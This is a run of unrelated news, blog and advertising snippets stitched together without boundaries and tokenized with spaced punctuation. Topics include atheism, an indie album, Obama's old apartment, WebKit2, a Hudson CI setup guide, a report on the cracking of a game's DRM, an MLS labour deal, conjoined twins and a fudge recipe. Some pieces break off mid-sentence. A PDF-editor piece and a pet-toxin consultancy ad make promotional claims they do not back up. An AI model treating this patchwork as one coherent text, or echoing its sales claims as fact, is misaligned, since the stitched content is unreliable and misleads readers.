“ It used to be a lot worse , ” said Ms. Gaylor , 54 , an atheist whose organization , the Freedom From Religion Foundation , recently won a suit in federal court here that declared the National Day of Prayer to be a violation of the First Amendment .
“ Things are changing .
Society is becoming more secularized .
It ’s becoming acceptable to be atheist and agnostic .
And there are more of us . ”
The nation ’s population continues to show signs of becoming less religious , according to the American Religious Identification Survey .
The number of people in 2008 calling themselves atheist or agnostic , or stating no religious preference , is an estimated 15 percent , nearly double the percentage in the early 1990s .
Around the country , nonbeliever clubs are springing up on college campuses .
We can add another name to the list of big indie bands releasing new albums this spring : Stars .
The arch , dramatic Canadian indie poppers will release The Five Ghosts , their fifth studio album , on June 22 .
This will be the first Stars album since 2007's In Our Bedroom After the War , and it'll also be the first release on the band 's own new label Soft Revolution , which will be licensed outside Canada via Vagrant .
All five members of the band contributed songwriting to the album , and Broken Social Scene / Apostle of Hustle member Andrew Whiteman makes a guest appearance .
The first single , " Fixed " , features lead vocals from Stars co-leader Amy Millan .
In a statement , Millan says , " We have never written an album with this much cohesion and unity .
It is the first time we 've had the luxury of being together in a huge room writing songs off the floor . "
Before the album drops , the band will tour clubs playing The Five Ghosts in its entirety , as well as fan - chosen old jams " Take Me to the Riot " , " Your Ex - Lover Is Dead " , and " Ageless Beauty " .
They have n't announced any of their dates yet , so keep an eye out .
Below , you 'll find the new joint 's tracklist and a behind the scenes making - of video :
The Five Ghosts :
01 Dead Hearts
02 Wasted Daylight
03 I Died So I Could Haunt You
04 Fixed
05 We Don't Want Your Body
06 He Dreams He 's Awake
07 Never Been Good With Change
08 The Passenger
09 The Last Song Ever Written
10 How Much More
11 Winter Bones
The six - story walk - up at 339 East 94th Street has seen much over the decades : generations of mostly white and Hispanic immigrants , nests of mice , drug deals , a police bust , at least one stabbing , a recent influx of young professionals , and a future presidential candidate : Barack Obama .
In his memoir , “ Dreams From My Father ” ( Three Rivers Press , 1995 ) , Mr. Obama described his Yorkville apartment , on East 94th Street between First and Second Avenues , as “ part of the shifting border between East Harlem and the rest of Manhattan . ”
He described a scene that will sound familiar to undergraduates and others who scraped by in the seedy and dangerous New York of the 1980s :
It was an uninviting block , treeless and barren , lined with soot - colored walk - ups that cast heavy shadows for the rest of the day .
The apartment was small , with slanting floors and irregular heat and a buzzer downstairs that did n’t work , so that visitors had to call ahead from a pay phone at the corner gas station , where a black Doberman the size of a wolf paced through the night in vigilant patrol , its jaws clamped around an empty beer bottle .
He said that he would chat with Puerto Rican neighbors and stop to talk to the boys on the stoop about the Knicks or the gunshots heard the night before .
An old neighbor died on the third floor landing with $ 1,000 in small bills rolled up in his refrigerator .
Mr. Obama was living in the building when he received a phone call about his father ’s death from a car accident in 1982 .
While no residents , current or past , who were contacted by The Times remembered Mr. Obama , they shared tales of a building with low rents and dicey circumstances during the early 1980s , when Mr. Obama apparently lived there , before and after he graduated from Columbia University in 1983 .
( “ B. Obama ” was listed in telephone directories at 339 East 94th Street in the early 1980s .
Mr. Obama did not specify the building number in his memoir , and his campaign has said that he has forgotten specifics of his youth . )
Frank Neubauer , 73 , who has lived all his life in the building except for two years in Brooklyn , confirmed Mr. Obama ’s account that it was a rough place back then .
“ They had a lot of drug users in the building , everybody knew it , ” he said .
( Three generations of his family have lived in the building , including his son , who now lives on the same floor . )
“ Nobody paid any attention .
People knew it was going on and that was it , and eventually the cops came and cleaned up the building . ”
Violent crime was also rampant .
“ I had a gun put to my head in the lobby , ” said David W. Burns , who lived in the building for two years in the early 1980s .
“ It was pretty late , 3 a .m. in the morning , I passed this guy on the street , but for some reason I forgot about him , ” he said .
“ He just followed me into the vestibule .
Between two doors you ’re pretty vulnerable . ”
The man took only his money .
“ Thank God . ”
Another resident was stabbed in the hall one evening by people who followed him home from the supermarket .
“ It was just in his thigh , ” Mr. Burns recalled .
“ He was lucky . ”
The landlord in the early 1980s was Jay Weiss , a real estate mogul who was then the husband of the actress Kathleen Turner .
Mr. Burns , who now works in the media industry and lives in Wilton , Conn. , said Mr. Weiss left behind hard feelings , because the building often had no heat and the front door was often unlocked .
Mr. Burns went after Mr. Weiss for overcharging for rent - stabilized apartments , eventually winning a judgment .
“ I actually used that money to pay for business school , ” Mr. Burns said .
When Mr. Neubauer was a child before World War II , the building was occupied by predominantly Austrian immigrant families with some Hungarians and German thrown in .
“ Back then everybody knew everybody in the building , ” he said .
As those families moved out , the inexpensive but relatively spacious apartments enticed working - class immigrant families , students and young professionals who needed cheap apartments in New York City .
( Mr. Burns and his wife , both struggling artists , paid $ 450 for a two - bedroom apartment . )
The building was a solution , he said , for “ when you are just getting out of college and you have no money , and you want to live in Manhattan . ”
These days , the upper reaches of Yorkville have changed — in ways that might have been unthinkable to New Yorkers of earlier eras .
Luxury high rises have sprouted up .
The 94th Street building has become home to a more professional crowd .
“ When someone moves out or passes away , they renovate the apartment and charge market rates , so now you have a predominantly yuppie crowd , ” Mr. Neubauer said .
( That probably explains why few of them were home during the day when City Room went knocking door to door , though they did leave many barking dogs behind — one apartment had a dog - sitter . )
Mr. Neubauer says he is a political independent , so he cannot vote for his former neighbor on Tuesday .
“ I have to find out who is going to win the primary .
Then I will concentrate more on who I am going to vote for , ” he said .
As for Mr. Obama ?
“ I like him .
I think he ’s very intelligent .
He ’s different .
He ’s fresh .
Maybe that is what we need . ”
Among those who live in one of the renovated apartments , with their hardwood floors and white wooden cupboards , was Jasmine Correa , 28 , who moved into the neighborhood three years ago , in part because of the high quality of the neighborhood ’s public schools .
She was surprised , she said , by how much the landlord , Faith Ministries , had raised the rent in the last year for a ground - floor studio , to just around $ 1,500 a month from around $ 1,100 .
“ This building was really bad back then , ” Ms. Correa had heard .
“ It ’s amazing that a leader used to live here in this building . ”
But her political sympathies lie elsewhere :
She said her preferred candidate is Ron Paul .
Jodi Kantor contributed reporting .
Read more Primary Journal blog entries from the New York region .
WorldBytes , a charity that trains people to make their own journalism got sick and tired of British policemen , bureaucrats and officials telling them that they do n't have the right to shoot motion pictures in public places .
There 's no law against making movies or taking pictures in public in Britain — and indeed , you can hardly turn around without a CCTV recording you — but officials and cops enforce this imaginary no - camera law as though it were the law of the land .
Saleha from WorldBytes adds , " In this film , we investigate what the public think and let people have their say on issues of the day .
Sick of being stopped , our volunteer film - makers made a stand against the arbitrary interference suffered by photographers and film makers and achieved a one day victory for citizen journalism . "
Freedom to film
( Thanks , Saleha ! )
Working from home seems to be the trendy solution for employees stuck in quarantine these days .
But some challenges will crop up once you start your work - at - home set - up online .
Maybe you need a better laptop with a more high - end spec sheet , or that you find your home WiFi and connectivity is rather lacking for continuous video chatting , or even still , you figure out that some specific software is needed for you to do your job properly .
Whatever your struggle is , finding proactive solutions for it is a hallmark of a great employee .
So if you find yourself needing a PDF editor , for example – the one that exactly is in your work desktop , but you ca n’t afford to pay for it , for the time being , then you should know that online PDF editing is a thing .
In this article , we ’ve listed down some prominent reasons why you should consider transitioning your PDF conversions to browser - based applications :
Can be accessed from any platform
Probably the best reason why you should exclusively use web - based PDF editors is that you do n’t need to have a specific gadget , or a spec requirement , to make edits on the go .
With browser - based PDF editors like PDFBear , which has a nifty online PDF converter application , you only need to have a working browser and a WiFi or data connection , and you ’re pretty much set !
What that means is you can do work from anywhere .
That affords you so much versatility , and in turn , you do n’t have to use so much time in your day figuring out how and where to do PDF edits .
Chrome is the browser of choice for PDF edits , but you can also use default ones on different platforms like Safari for Mac and iOS and Edge for Microsoft .
You can even do it in Mozilla if that ’s your preference .
More accessible
Accessibility is the name of the game when it comes to a more streamlined approach to office work .
With a web - based PDF application , you do n’t have to be tied to any device .
You can be anywhere in the world , doing business lunches and transactions , or rubbing elbows with potential clients , and you can still be on top of your workload .
Imagine a world where you can update on the state of your PDF files from virtually any situation .
You can be vacationing in a far - flung beach resort and still have access to tools that helps you organize and convert PDF files .
This just means that with web - based PDF applications like PDFBear , you get to handle your time .
Additionally , you will not be a slave to a particular device that has all the software you need !
Easy , quick , and reliable online
PDF editing online has come a long way from the rudimentary set up that it started with a few decades ago .
The individual applications are now faster than ever , more optimized , and privacy is not an issue at all .
There was a time when even the thought of doing PDF conversions online is a headache , but those qualms are a thing of the past .
Today , online PDF editing like converting PDFs , merging two separate files into one , even password - protecting files are easier and more securely done online .
And with the presence of numerous free web - based PDF applications , you can be sure that if your favorite site is down , the next site offering the same services is as good as any .
Secure online
Privacy is one of the most important parts of successfully editing a PDF online .
People would n’t want other people to snoop through their uploaded documents , and web - based PDF applications have made sure that this is taken care of with secure uploads every time .
Files are encrypted once uploaded to the cloud , and they are deleted after an hour or so of uploading time to make space for new ones .
Takeaway
The next time you have a pending PDF edit , why not do it online ?
If it involves converting , merging , splitting , even compressing a PDF file , the online route is the way to go .
Trust us when we say , you will not be disappointed .
In fact , you ’d find your workflow more seamless !
Just shy of my sixth birthday when the Berlin Wall fell on 9 November 1989 , I have no memory of ever being aware of the danger of imminent nuclear attack .
For my oldest brother Seb , born in 1968 , things were very different .
This difference in our childhoods has been highlighted by political events both here and across the Atlantic over the last few weeks .
While Barack Obama continues to inspire with calls for a nuclear - free world , political realists in Washington , not least Obama 's own defence secretary , Robert Gates , recognise that America may well be powerless to prevent the spread of nuclear weapons across the Middle East .
Writing for the Boston Globe last week , the brilliant commentator HDS Greenway argued that even if America 's military might were not already stretched thin , it would at best only be capable of delaying Iran 's nuclear program for a few years .
Meaning the necessary alternative for America is to learn to live with the Iranian bomb .
Back in the UK , the nation watched as Nick Clegg made the Lib Dems ' case for reviewing the replacement of Trident – arguing for the need to look for a cheaper alternative or possibly , just possibly , even abandon an independent nuclear deterrent for Britain completely .
It has been much commented upon that Clegg 's proposal , toned down from earlier , bolder pronouncements on the subject , resulted in a rare moment of political agreement between David Cameron and Gordon Brown .
Debate will , of course , continue to rage over which politician and view is right .
What I think is also worth looking at , however , is the reaction by different generations , both to the political issue of replacing Trident and to the global implications of continued nuclear armament .
Talking to Seb after the debate , I was struck by how angry he was .
Angered by Brown and Cameron 's reactions to Clegg – in particular , the fact both men expressed a belief that a nuclear deterrent makes us safer .
But also infuriated that just one year after Obama 's supremely optimistic speech in Prague , the idea of a nuclear - free world was being dismissed on both sides of the Atlantic as political naivety .
For someone who grew up during the cold war , the claim that a nuclear deterrent makes us feel safer , seems , to put it plainly , bollocks .
After an afternoon watching archived Protect and Survive films I can begin to see why .
These are chilling reminders of a different age , beginning with the image of a family silhouetted against a mushroom cloud and including lines such as : " A warning may come quite unexpectedly .
Fall out can kill , though you cannot see it , feel it or smell it .
There is danger outside . "
Psychologist Professor Stanley Rachman , a leading authority on the development of anxiety , suggests " fears can be acquired by three pathways : conditioning , vicarious exposures and by the transmission of information and instruction " .
Just watching these dated public information films , let alone imagining the mood in the late 70s and early 80s , with the Doomsday Clock inching ever nearer midnight and emergency drills at school and home , there can be no doubt that the constant , terrible threat of nuclear holocaust fulfils all these criteria .
Indeed , prompted by that fear , the activism of the CND was the driving force in politicising a generation .
For the generation that came after , this sensitised fear simply is n't there .
Of course , we are aware and extremely concerned by both the danger and the mindboggling economic implications of a national nuclear arsenal .
The anxiety over nuclear weapons , however , cannot help but be very different for anyone younger than 35 , whose childhood was not lived under the ever - present , terrifying threat of the bomb .
Our generation 's political awakening was informed by the post - 9/11 world .
We marched against Iraq , but far fewer marched against nukes .
Maybe because we simply were n't afraid .
What implications this shift in perspective may have , both for politicians seeking to engage with younger voters and also for those starting to take a role in deciding policy , is difficult to guess .
A different frame of mind could prove perilous , leading us to underestimate the danger mutually assured destruction , or the lack of it , still poses .
Or might it , instead , pave the way for a more rational approach to humanity 's continued attempts to develop and maintain the ability to annihilate itself ?
WALCOTT , Iowa — Semi driver Dave
White happily sequestered himself in his rig at a truck stop on a rural stretch of Interstate 80 , waiting to pick up his next haul : 45,000 pounds of Spam .
He used to loathe the downtime in his job .
Then , he bought a sewing machine .
Since last year , when the economy left drivers with fewer hauls , Mr. White , a ...
EXCLUSIVE
ABC is planning a " Lost " weekend :
The network has just scheduled a repeat showing of the show ’s two - hour 2004 pilot for the night before its finale .
The J.J. Abrams - directed , $ 10 million - plus spectacular will air Saturday , May 22 , from 8 - 10 p.m. , ABC told affiliates today .
( UPDATE 7:44 AM 4/23 – ABC confirms that it ’s airing the pop -up video , a k a " enhanced " version of the pilot . )
The two - hour finale will air the following evening from 9 - 11 p.m .
This brings the total number of " Lost " hours ABC is planning for the week of May 17 to 10 8 .
There ’s the penultimate episode of May 18 ; the pilot encore on May 22 ; a two - hour pre-show / recap on May 23 ; the finale itself ; and " Jimmy Kimmel : After the Final Rose " ( also on May 23 ) .
The last time ABC aired the " Lost " pilot , by the way , was back in February 2006 .
It also got repeated in 2004 and 2005 .
So you ’ve seen people talking about WebKit2 , perhaps have seen someone claiming it “ drops support for Linux “ , and you ’ve been wondering what the hell that means for WebKitGTK +.
Well , welcome to the preemptive Q&A section with WebKitGTK + maintainers =D . Let ’s first explore some history so we can better understand what exactly is going on .
What exactly is WebKit2 ?
Currently , when we say “ WebKit ” we really mean one of the ports that are built on top of WebCore using the WebKit layer .
WebCore is the part that does all of the hard Web- related work , WebKit an API layer that exposes WebCore functionality in a coherent way , so that the platform - specific ports can expose a public API layer for their applications to use , which is usually also called “ WebKit ” .
This WebKit layer was designed by Apple to build the Mac , and Windows ports it maintains , and was later released as Free Software so that other ports , such as the GTK + , Qt , EFL ports could be built on top of it , instead of having to do all the heavy lifting from WebCore directly .
WebKit2 is nothing more than the second version of that interface , with a whole lot of changes on what you can expect from it , and on how it interacts with WebCore , and the platform - specific API and UI .
First of all , the first WebKit was not API stable , and that interface was usually not made public by the various ports – they only exposed their platform - specific APIs .
WebKit2 is being designed to provide a stable , cross-platform , C - based , non-blocking public API .
This is huge .
It will allow cross-platform code to be written without having to consider language , and port differences for basic functionality .
The second big change is the API will be made fully non-blocking .
Currently most things you do are asynchronous already , but some of them may be completed in a synchronous ways ( like , loading a string into WebKit instead of an URI ) .
This is important for responsiveness , and is also a very important need for what comes next : process splitting .
WebKit2 will bring into WebKit proper the concept of splitting the UI process from the Web process , similar to what Chromium has .
It also much more awesome than what Chrome has for a large number of reasons , including , but not limited to :
It ’s being contributed directly to the WebKit project , in a cross- platform way that lets ports such as WebKitGTK + take advantage of it , instead of being shipped directly into Safari , like Google does with Chrome ;
The process separation goes bellow the API layer , meaning that all complexity involved in managing the process separation is handled by the library , and hopefully none of it leaks to the application using it ; that means that applications like Devhelp and Yelp will be able to take advantage of this without having to make their lives more complicated ;
There ’s a much better diagram in WebKit2 ’s wiki page , but here goes a simplified version that demonstrates what I ’m talking about :
What WebKit2 is not ?
WebKit2 is NOT a rewrite of the whole WebKit stack .
Webcore will continue mostly unchanged , and all ports currently building on top of it will keep working .
It is also not a fork – the code lives in the same tree as the current version of WebKit , which will allow us to progressively move towards using this new , improved layer .
WebKit2 is not Apple - only , and it is not dropping Linux support .
Initial builds of the code that is being landed will likely show up building on Linux in the near future ( specially because us porters are already eager to play with it ) .
What happens to WebKitGTK +?
In the near future , nothing special .
We will continue working towards making it feature - complete , more stable , faster , and rocking on it as always .
We will , though , start working out how we can best take advantage of WebKit2 in order to provide an even more awesome library for the G world .
What this means is you can expect us to have a library that will provide a nice GTK + widget , just like we have today , with a GObject - based API , like we have today , but that is built on top of this new WebKit2 infrastructure , taking advantage of the process - splitting , and the bigger focus on not blocking the UI thread .
This should give us a platform that is more stable , and faster and more responsive than what we already have today .
The API is bound to change , of course , but the WebKit2 version of WebKitGTK + will be a separate , parallel - installable library , and we will keep supporting the WebKit1 version while we work on making the new one at least as good as the current one .
This is long term we ’re talking here .
We ’ll likely see WebKitGTK + 1.4 , and 1.6 come to life before we are satisfied enough with WebKitGTK+2 .
We hope this clears some of the doubts up , and lightens your hearts !
The WebKitGTK + maintainers .
We 're always looking for new tools to make our development environment more robust here at Caktus .
We write a lot of tests to ensure proper functionality as new features land and bug fixes are added to our projects .
The next step is to integrate with a continuous integration system to automate the process and regularly check that status of the build .
After attending Dr. C. Titus Brown 's
" Why not run all your tests all the time ?
A study of continuous integration systems . " talk at Pycon and seeing Django 's Hudson setup , I figured I 'd take a look at Hudson CI .
Installing Hudson and basic setup
Hudson is very easy to setup .
I started with a fresh Ubuntu 9.10 install on the smallest Rackspace cloud instance and had it running after a few commands .
I followed the Debian setup instructions , which basically consists of :
$ wget - O - http://hudson-ci.org/debian/hudson-ci.org.key | sudo apt - key add - $ echo " deb http://hudson-ci.org/debian binary / " >>
/etc/apt/sources.list $ apt - get update $ aptitude install hudson $ apt - get upgrade
That 's it !
It 's already up and running on port 8080 using it 's own web server .
Go ahead and pull it up in your browser .
As a test , let 's setup django - crm ( a Caktus open - source community project ) as our first Hudson job .
Click " New Job " , type in a job name , click " Build a free - style software project " , and hit OK .
django - crm contains a sample project that we 'll use to run the test suite .
On the job configuration page , check Subversion in the Source Code Management section and type in the Repository URL :
Click Save , run the job by clicking " Build Now " , and check out the Console Output :
Started by user anonymous Checking out a fresh workspace because / var / lib / hudson / jobs/django-crm/workspace / sample_project does n't exist Checking out http://django-crm.googlecode.com/svn/trunk/sample_project
A manage.py A site_media A site_media/css A site_media/css/jquery.autocomplete.css
A site_media/css/django-contactinfo.css
A site_media/js A site_media/js/jquery-ui-1.7.2.custom.min.js A site_media/js/jquery-1.3.2.min.js A site_media/js/django-crm.js A site_media/js/jquery.autocomplete.min.js
... Finished : SUCCESS
Cool , now let 's run some tests .
Too keep things simple , let 's grab Django and a few dependencies using aptitude :
$ wget http://www.djangoproject.com/download/1.1.1/tarball/
$ tar xzvf Django - 1.1.1.tar.gz $ cd Django - 1.1.1 $ sudo python setup.py install $ aptitude install python - dev python - imaging python - setuptools python-pip
To run the tests , add an " Execute shell " build step in the Build section with this command :
#!/bin/bash -ex cd sample_project python manage .py test crm
Run the job again and look for the test results in the console output :
[ workspace ] $ / bin/sh -xe /tmp/hudson6670261053226891793.sh + cd sample_project + python manage .py test crm ... Finished : SUCCESS
XML Test output
To integrate Hudson with the Django test suite , I used unittest - xml - reporting .
Just " pip install unittest - xml - reporting " and add the following lines to your settings file :
TEST_RUNNER = ' xmlrunner.extra.djangotestrunner.run_tests '
TEST_OUTPUT_VERBOSE
= True TEST_OUTPUT_DESCRIPTIONS
= True TEST_OUTPUT_DIR = ' xmlrunner '
Then check " Publish JUnit test result report " in the Post - build Actions section and add the path to the test XML output " sample_project/xmlrunner /*.xml " :
Run the job and you should see a new " Test Result " link in the navigation .
Now you can view the test results right in your browser window .
Coverage
To add coverage reports , I used Ned Batchelder 's coverage .py ( pip install coverage ) .
Navigate to Hudson 's plugin manager ( Hudson -> Manage Hudson -> Manage Plugins ) , install the Cobertura Plugin , and restart Hudson when prompted .
Then modify your shell script like so :
#!/bin/bash -ex cd sample_project coverage run manage .py test crm coverage xml -- omit = /usr /
This will generate an XML coverage report in the working directory , so we just need to tell Hudson where to look for it .
Check " Publish Cobertura Coverage Report " in the Post - build Actions section and enter the path to the report :
Run the build again and you should have access to a new " Coverage Report " link .
More to come ...
This was just a simple example of getting Hudson setup with a Django project and I know a lot more can be done with Hudson ( check out the large number of available plugins ) .
The top items on my todo list are : see Hudson setup environments with virtualenv and pip , integrate more closely with the test suite ( possibly using nose ) , check for PEP compliance , and setup build failure notifications .
I hope to write more as I continue to setup our Hudson environment !
References
A few useful Hudson / Python / Django links I discovered while running through this setup :
Brisbane commuters may have access to underground shops once a planned new 19 km cross-river rail project is completed , Premier Anna Bligh says .
The state government today announced it was planning to build an $ 8 billion underground rail tunnel from near Woolloongabba under the Brisbane CBD to Bowen Hills .
The proposed rail corridor .
CLICK HERE TO SEE A LARGER VERSION
The premier made the announcement as part of the Cross River Rail study , which aims to find a new north - south connection in the inner-city .
A 19 km proposed corridor would include a tunnel under the Brisbane River and new stations , running from Salisbury , in Brisbane 's south , to Wooloowin , in the north , via Woolloongabba , the CBD and Bowen Hills .
In the ongoing effort to protect the hard work of the developers , Ubisoft created a DRM scheme that required a constant internet connection for all gameplay , be it single player or multiplayer .
Without a constant connection to Ubisoft 's master servers , the game can not be played .
This form of protection caused great inconveniences for buyers of the game , be it on the internet connection end or a takedown of the Ubisoft servers .
While the DRM was causing grief for real buyers of the game , it did keep the pirates at bay for far longer than the usual PC game .
But the game hackers have finally cracked it .
Cracking group known as Skid Row claims to have created a crack that removes the required internet connectivity from Assassin 's Creed II .
Some other cracks emulated Ubisoft 's servers , fooling the game into thinking it was authenticated .
Skid Row , however , said in its nfo notes that its crack cannot be compared to other emulation cracks , as " does not construct any program deviation or any kind of host file paradox solutions . "
Skid Row also left a note for Ubisoft , which read , " Thank you Ubisoft , this was quiete [ sic ] a challenge for us , but nothing stops the leading force from doing what we do .
Next time focus on the game and not on the DRM .
It was probably horrible for all legit users .
We just make their lifes [ sic ] easier . "
While we do not condone piracy in any fashion , solutions such as this one created by hacking groups ensure that Assassin 's Creed II will still be playable years from now , or in the event of a connection outage .
MLS , players ' union reach deal , avert strike
Five days before the season opener , MLS and the players ' union have struck a deal on a new , five - year collective bargaining agreement .
The players had threatened to strike if a new pact could n't be reached this weekend .
With approximately 25 players participating , the sides met all day and night Thursday and Friday at the offices of the Federal Mediation and Conciliation Service in Washington , and announced the deal this afternoon .
The players ' primary issue was free agency , and although they were not granted full rights to move between clubs in the league , they did agree to a " re-entry draft " for those out of contract at the end of the season .
" Going forward , we are going to have a real relationship with the league as opposed to being combative at times , and that 's crucial for any league to do well , " Los Angeles Galaxy forward Landon Donovan said .
" We have been extremely unified and united throughout this process .
It 's been a very productive few weeks .
We are all mainly excited to play soccer this year and proud of what we accomplished .
This is not a one - day celebration ; this is the start of many good things to come for many years for our players and our league . "
According to union chief Bob Foose :
* For the first time , a majority of players will have guaranteed contracts .
* The players ' ability to move freely within the league will be greatly improved .
* Player compensation will be increased substantially .
Further details were not immediately revealed .
The sides said it will take a while to finalize specifics and make them available to the public .
Rest assured , it 's a done deal .
" This has been a major victory for the process of collective bargaining , " federal mediator George Cohen said .
" It was not fun , it was tiring , but it was productive , " Commissioner Don Garber said .
" I look forward to not having to do it quite like this in five more years . "
For more info .....
Free agency was not adopted , as the players had hoped , but the sides did compromise .
Said Garber : " MLS was founded on the principle that our owners would not be keeping against each other for player services .
When we think of free agency , it is that concept of internal bidding , and there will not be internal bidding for player services .
Players whose options are not exercised , players who are terminated and players at a certain age - and just respect the fact that we have got to get this out to our own people before we get it to the public - will have the opportunity with a certain mechanism of also going into this re-entry draft .
That process addresses , to a large extent but not to the total extent , the players ' wishes and desires .
At the same time , it provides the league with something that is crucial to us and will remain crucial to us .
In our view , there is no actual free agency . "
Added Foose : " We made progress on this area .
Not necessarily as much as we would have chosen , but that is collective bargaining agreement .
We made a lot of progress in other areas as well , and there is real progress on correcting certain situations that were vitally important to our players involving movement within the league , including teams retaining rights to players .
There are changes there , significant changes . "
Do You Know Your Home Could Be Silently Killing Your Pet ?
Thousands of pollutants enter your home every year .
The greatest threat your pet will face is no longer found outdoors .
The greatest threat your pet will face could be right at home !
Do n’t allow your pet to be another statistic !
140,000 reported cases of toxicosis or poisoning in pets in 2009 ( ASPCA ’s Animal Poison Control Center )
You CAN change this !
Are you concerned about environmental toxic substances to which your pets might be exposed and affecting their health ?
Did you know that pets are more susceptible to toxic home environments than humans ?
Are you concerned about the impact your every day actions might have on your pets and the environment ?
Do you want to provide a healthy and safe toxic - free home environment for your companion animals ?
Do you want to feel satisfaction and peace of mind that your actions are benefiting your pets ’ health and yours while helping the planet ?
Do you want your precious companion animals to live as long and healthy as possible ?
Do you feel overwhelmed by the ‘ green ’ choices available , yet do n’t know where to start or what to ask ?
Do you need help finding and choosing non-toxic , eco-friendly products but do n’t have the knowledge , patience or time to look for them ?
Whether this is your first green step or want advice in specific areas to green your pets and home , Marisa can assist you !
Every day we are exposed to various chemicals that are carcinogenic .
According to the U.S. Environment Protection Agency , the world we live , work and play in is now a “ chemical soup ” .
Unknowingly , you could be contributing to the toxicity of your home environment .
This could have serious and long - term health consequences for your precious pets and you !
Most homes have multiple sources of pollutants that contribute to the toxicity of indoor air .
Many of these chemicals are unnoticeable and dangerous .
Quite a number of these are silent killers – you wo n’t know something is wrong until it might be too late .
Our pets have shorter life spans and faster metabolisms than we do , and because they are constantly on the ground , they are more exposed and more vulnerable to these unseen dangers .
The cumulative effect of these indoor pollutants can pose serious health risks .
Typically , indoor air pollution in our homes is 10 to 50 times higher than it is outdoors ( U.S. Environmental Protection Agency ) .
If you are concerned that your pets ’ health ( and your health , as well ) could be jeopardized by your home environment , the good news is that
You can still do something about it NOW !
Order your Green Pet , Green Home Consultation and let Marisa assist you in having a green pet and creating a non -toxic healthy home for you and your precious companion animals TODAY !
Because , what you ca n’t see , can hurt your pets and you !
Have a Green Pet , Green Home Consultation
Services :
A ) One - On - One Personalized Phone Consultation $ 129.00
B ) Do-it - Yourself Pet & Home Green Assessment $ 29.00
C ) Product Sourcing $ 49.00
Funds
I generate with my consulting services go towards the creation of my animal sanctuary .
Also , a 10 % donation of every consulting service purchase will be given to an animal sanctuary , rescue or shelter .
I appreciate your support !
The twins Hassan and Hussein did not share any major organs Conjoined twins who were born in London have been successfully separated in a complex 14 - hour operation .
Four - month - old Hassan and Hussein Benhaffaf , who were conjoined at the chest , underwent surgery at London 's Great Ormond Street Hospital .
Consultant paediatric surgeon Edward Kiely said : " The twins are in intensive care and are sedated but stable .
We are pleased with how the operation went . "
The boys came from their home in the Irish Republic for the operation .
Their parents , Angie and Azzedine Benhaffaf , from East Cork , said : " The sun is shining today for our two little fighters , who have won the battle of their lives .
" Words can not express the relief and love we feel for our two boys .
We thank God , we thank the surgeons and the gifted team at Great Ormond Street Hospital , and we thank from the bottom of our hearts the Irish nation and everyone who prayed for our beloved twins .
CONJOINED TWINS
Conjoined twins are extremely rare , occurring in as few as one in every 200,000 live births
They are created just a few days after conception - most likely by the incomplete splitting of the fertilised egg Most are stillborn , and a proportion of those who are born alive do not survive long afterwards " We are so proud of the courage and strength that Hassan and Hussein have shown , and they both have made the world a much better place with them in it . "
The operation involved about 20 medical staff , including four surgeons and four anaesthetists , working in shifts .
The team had previously dealt with 21 separations and nine inoperable cases .
The twins , born at University College London Hospital , did not share any major organs despite being joined at the chest .
There were fears when Mrs Benhaffaf was pregnant that the boys might share a heart , and after they were born on 2 December she said the operation to separate them would be their " final battle " .
The family , including daughters Malika , four , and Iman , two , moved to London for the operation and are expected to remain for up to four months while the twins recover .
A special fund was set up in Ireland to help the family cover their medical costs .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Coconut Milk Fudge [ Coconut Brigadeiros ]
Adapted quite a bit from The Brazilian Kitchen , via the New York Times
A.k.a. Coconut Milk Caramels or Coconut Brigadeiros .
Nervous about the gooey / sweet factor , I played around a little , using unsweetened coconut milk ( the recipe did n’t specify , so I used what I thought would work ) and then salted butter ( honestly , by accident , but that pinch of salt really helped keep the treat on this side of treacly ) .
These candies are infinitely tweakable .
Personally , I think they ’d be fantastic with a pinch of cinnamon , Mexican or otherwise .
My mother wanted to try them with a drop or two of almond extract .
I think vanilla could work well in there , too .
And you can roll them in the suggested toppings — coconut , pistachios and sprinkles — or use your own .
Crushed cookie crumbs , anyone ?
For classic , coconut - free brigadeiros , chocolate and other versions , check out recipe leads here .
Yield : 24 to 30 candies
1 cup sweetened condensed milk
1/2 cup unsweetened coconut milk
2 tablespoons salted or unsalted butter ( salted will give the candy more contrast )
2 teaspoons light corn syrup
1/3 cup finely shredded unsweetened coconut ( I lightly toasted mine , for crunch )
1/3 cup ground pistachios ( see Note below )
1/3 cup chocolate sprinkles or “ vermicelli ” ( see Note below )
In a medium - size heavy saucepan , combine condensed milk , coconut milk , butter and corn syrup .
Bring to a boil over medium heat .
Reduce heat to low and whisk constantly until fudgy .
The recipe notes that when mixture is ready , it will pull together into one soft piece , leaving browned residue on bottom of pan and that this should take 8 to 10 minutes .
This took me 20 to 25 minutes , and the candy began taking on a beige , caramelized color .
Slide mixture into a bowl .
( Do n’t scrape the pan ; leave any residue behind . )
Let cool to room temperature , then refrigerate until very firm , at least 4 hours .
Or , you could realize that the nanny has to leave in an hour , chill it for only 30 and discover that nothing bad will happen if you do n’t wait the whole cooling time .
You ’ll have to be more careful if you use “ real ” i.e. meltable chocolate sprinkles but otherwise it will have no ill - effect to speed the process up . )
Scoop out teaspoonfuls of the mixture ( I used my one teaspoon measure ) and use your hands to roll into balls , about 3/4 - inch in diameter .
I found having just a drop or two of water in my palms — not wet , just a little moist — helped form them .
Set aside on a baking sheet .
Place toppings in wide bowls and roll brigadeiros through them , covering the surface completely .
Store in an airtight container at room temperature for 2 days , or refrigerate for up to 1 month .
Serve at room temperature .
Chocolate “ vermicelli ” : I got a little freaked out when I saw the ingredient list on the chocolate sprinkles I had brought home from the store .
Look , I do n’t need to pretend that chocolate sprinkles are health food , but I like to imagine I ’m eating something with at least a minute smidgen of chocolate in it .
I ended up spending way too much on a bottle of “ chocolate vermicelli ” ( they look like chocolate sprinkles but are almost 100 % pure chocolate , and delightfully , taste that way too ) but I ’d buy them next time from Amazon or King Arthur Flour ’s Baker ’s Catalog for much less .
Pistachios :
Since toasted nuts always , always taste better than raw ones , I toasted and ground a batch to coat the candy only to find the brown / green shade … um , a little unpretty .
Looks won out and I used ground raw pistachios in the end .
I actually ended up preferring the softness of the coating .
Those tiny cups : I know someone is going to ask me where I bought those colorful little candy cups and I ’m sorry , as my answer could not be more inconvenient : Vienna .
A grocery store .
I ’m kind of obsessed with going to grocery stores in foreign countries and always walk out with random stuff like this .
Anyway , Amazon sells # 4 size cups ( 1 - inch base ) in brown and white ; however , mine are actually # 3 size ( 3/4 to 7/8 - inch base ) which I found online at a smaller store .
Do More : Twitter
Facebook
Pinterest
Print
Email
